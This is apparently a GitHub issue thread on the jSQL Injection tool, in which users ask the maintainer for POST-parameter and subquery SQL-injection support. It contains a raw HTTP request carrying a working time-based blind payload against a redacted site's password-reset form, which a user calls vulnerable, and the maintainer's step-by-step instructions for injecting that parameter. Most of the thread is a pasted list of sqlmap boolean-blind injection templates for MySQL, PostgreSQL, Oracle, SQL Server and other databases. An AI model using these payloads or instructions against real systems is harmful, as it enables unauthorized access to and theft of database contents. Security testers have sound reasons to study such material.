can you make option parameter for support post request injection sql

[selectfromblackhydra]

post sql injection need parameter to test sql injection in post request because if not in my case sql injection not inject or false positive can you add subquery sql injection like sqlmap because in my case injection is vuln with subquery injection boolean blind thank you

[ron190]

• Sure, just deploy the advanced panel with the chevron on the right, then select radio for POST on the left:

• Can you be more specific with a error message or a detailed context ?

Strategy Blind should work too, you can debug logs in tab Network to track the issue. You can also share the sqlmap option tag you are using if you are refering to a specific tag.

[selectfromblackhydra]

i mean can you support post like this.

POST /forgot_action.php HTTP/1.1 Host: redacted Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=> Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Appl> Connection: close Cache-Control: max-age=0 Cookie: PHPSESSID=fqn1cf8c9aoompe9brgkqr8jn9 Origin: redacted Upgrade-Insecure-Requests: 1 Referer: redacted.> Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="130",> Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 21

ktp=BoSUhm'%2b(select*from(select(sleep(20)))a)%2b'&nik=BoSUh>

[selectfromblackhydra]

this target is vuln but no waf but i have problem connection without correct parameter is ktp in sqlmap i dont now in jsql

[ron190]

I know people uses similar block template, so I'll see if it's possible to integrate it properly, though in jSQL your template is equivalent to what is on the screenshot:

• Set the <url>/forgot_action.php in address bar
• Select the POST radio
• ⚠ 👉 Copy/paste the request parameters but reverse it to nik=&ktp= to inject ktp, of check option Inject every Request params in Preference 👈 ⚠
• Copy/paste the block Host to Content-Length into header parameter, use the right button to open the modal

Also you may require a proper active session for Cookie: PHPSESSID=, depending on the service tested.

[selectfromblackhydra]

hey ron maybe you want learn sqlmap payload i have the file here This XML file does not appear to have any style information associated with it. The document tree is shown below.

Show queries

1 1 1 1,8,9 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] AND [RANDNUM]=[RANDNUM1] 1 1 3 1,9 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] OR [RANDNUM]=[RANDNUM1] 1 3 3 1,9 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] OR NOT [RANDNUM]=[RANDNUM1] 1 2 1 1,8,9 1 AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) [GENERIC_SQL_COMMENT] AND [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) 1 2 3 1,9 2 OR [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) [GENERIC_SQL_COMMENT] OR [RANDNUM]=(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) 1 2 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] AND [RANDNUM]=[RANDNUM1] 1 2 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] OR [RANDNUM]=[RANDNUM1] 1 4 3 1 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] [GENERIC_SQL_COMMENT] OR NOT [RANDNUM]=[RANDNUM1] 1 3 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] # AND [RANDNUM]=[RANDNUM1]

MySQL

1 3 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] # OR [RANDNUM]=[RANDNUM1]

MySQL

1 3 3 1 1 OR NOT [INFERENCE] OR NOT [RANDNUM]=[RANDNUM] # OR NOT [RANDNUM]=[RANDNUM1]

MySQL

1 3 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] %16 AND [RANDNUM]=[RANDNUM1]

Microsoft Access

1 3 3 1 2 OR [INFERENCE] OR [RANDNUM]=[RANDNUM] %16 OR [RANDNUM]=[RANDNUM1]

Microsoft Access

1 2 1 1,2,3 1 RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))

MySQL

1 3 1 1,2,3,8 1 AND MAKE_SET([INFERENCE],[RANDNUM]) AND MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) AND MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

1 3 3 1,2,3 2 OR MAKE_SET([INFERENCE],[RANDNUM]) OR MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) OR MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

1 4 1 1,2,3,8 1 AND ELT([INFERENCE],[RANDNUM]) AND ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) AND ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

1 4 3 1,2,3 2 OR ELT([INFERENCE],[RANDNUM]) OR ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) OR ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

1 5 1 1,2,3,8 1 AND EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) AND EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)

MySQL

1 5 3 1,2,3,8 2 OR EXTRACTVALUE([RANDNUM],CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 0x3A END) OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 0x3A END) OR EXTRACTVALUE([RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 0x3A END)

MySQL

1 2 1 1,8 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL

PostgreSQL

1 3 3 1 2 OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CAST('[RANDSTR]' AS NUMERIC) END)) IS NULL

PostgreSQL

1 2 1 1 1 AND (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL AND (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL

Oracle

1 3 3 1 2 OR (SELECT (CASE WHEN ([INFERENCE]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL OR (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN NULL ELSE CTXSYS.DRITHSX.SN(1,[RANDNUM]) END) FROM DUAL) IS NULL

Oracle

1 2 1 1 1 AND CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END AND CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END AND CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END

SQLite

1 3 3 1 2 OR CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END OR CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END OR CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE JSON('[RANDSTR]') END

SQLite

1 1 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END)) 1 4 1 1,2,3 3 MAKE_SET([INFERENCE],[RANDNUM]) MAKE_SET([RANDNUM]=[RANDNUM],[RANDNUM1]) MAKE_SET([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

1 5 1 1,2,3 3 MAKE_SET([INFERENCE],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])

MySQL

1 4 1 1,2,3 3 ELT([INFERENCE],[RANDNUM]) ELT([RANDNUM]=[RANDNUM],[RANDNUM1]) ELT([RANDNUM]=[RANDNUM1],[RANDNUM1])

MySQL

1 5 1 1,2,3 3 ELT([INFERENCE],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])

MySQL

1 4 1 1,2,3 3 ([INFERENCE])*[RANDNUM] ([RANDNUM]=[RANDNUM])*[RANDNUM1] ([RANDNUM]=[RANDNUM1])*[RANDNUM1]

MySQL

1 5 1 1,2,3 3 ([INFERENCE])*[ORIGVALUE] ([RANDNUM]=[RANDNUM])*[ORIGVALUE] ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]

MySQL

1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END))

PostgreSQL

1 4 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))

PostgreSQL

1 5 1 1,2,3 3 (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)

PostgreSQL

1 5 1 1,2,3 3 (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT [ORIGVALUE] FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)

PostgreSQL

1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))

Microsoft SQL Server Sybase

1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))

Microsoft SQL Server Sybase

1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/0 END) FROM SYSMASTER:SYSDUAL)

Informix

1 4 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM] END) FROM SYSMASTER:SYSDUAL)

Informix

1 3 1 1,3 3 IIF([INFERENCE],[RANDNUM],1/0) IIF([RANDNUM]=[RANDNUM],[RANDNUM],1/0) IIF([RANDNUM]=[RANDNUM1],[RANDNUM],1/0)

Microsoft Access

1 4 1 1,3 3 IIF([INFERENCE],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)

Microsoft Access

1 2 1 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) 1 3 1 1,2,3 3 (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM DUAL UNION SELECT [RANDNUM1] FROM DUAL) END) 1 2 1 1,3 3 (CASE WHEN [INFERENCE] THEN [RANDNUM] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [RANDNUM] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [RANDNUM] ELSE NULL END) 1 3 1 1,3 3 (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END) 1 2 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))

MySQL >= 5.0

1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END))

MySQL >= 5.0

1 2 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))

PostgreSQL

1 4 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))

PostgreSQL

1 5 1 3 1 ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) ,(SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)

PostgreSQL

1 3 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))

Microsoft SQL Server Sybase

1 4 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END))

Microsoft SQL Server Sybase

1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

Oracle

1 4 1 2,3 1 ,IIF([INFERENCE],1,1/0) ,IIF([RANDNUM]=[RANDNUM],1,1/0) ,IIF([RANDNUM]=[RANDNUM1],1,1/0)

Microsoft Access

1 5 1 2,3 1 ,IIF([INFERENCE],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)

Microsoft Access

1 4 1 2,3 1 ,(CASE WHEN [INFERENCE] THEN 1 ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END)

SAP MaxDB

1 5 1 2,3 1 ,(CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) ,(CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)

SAP MaxDB

1 4 1 3 1 ,(SELECT CASE WHEN [INFERENCE] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)

IBM DB2

1 5 1 3 1 ,(SELECT CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1) ,(SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE RAISE_ERROR(70001, '[RANDSTR]') END FROM SYSIBM.SYSDUMMY1)

IBM DB2

1 3 1 1,2 1 HAVING [INFERENCE] HAVING [RANDNUM]=[RANDNUM] HAVING [RANDNUM]=[RANDNUM1] 1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END) # ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.PLUGINS) END)

MySQL >= 5.0

1 3 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)

PostgreSQL

1 5 1 1-8 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1 ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1 -- ;SELECT * FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1

PostgreSQL

1 3 1 1-8 1 ;IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] ;IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- ;IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]

Microsoft SQL Server Sybase

1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END) -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE [RANDNUM]*(SELECT [RANDNUM] UNION ALL SELECT [RANDNUM1]) END)

Microsoft SQL Server Sybase

1 4 1 1-8 1 ;SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL -- ;SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL

Oracle

1 5 1 1-8 1 ;IIF([INFERENCE],1,1/0) ;IIF([RANDNUM]=[RANDNUM],1,1/0) %16 ;IIF([RANDNUM]=[RANDNUM1],1,1/0)

Microsoft Access

1 5 1 1-8 1 ;SELECT CASE WHEN [INFERENCE] THEN 1 ELSE NULL END ;SELECT CASE WHEN [RANDNUM]=[RANDNUM] THEN 1 ELSE NULL END -- ;SELECT CASE WHEN [RANDNUM]=[RANDNUM1] THEN 1 ELSE NULL END

SAP MaxDB

[mrdragonblack]

can make jsql support in my case my injection they need parameter here the photo if not jsql can not detect the injection because this is in multipart in post thank you

[selectfromblackhydra]

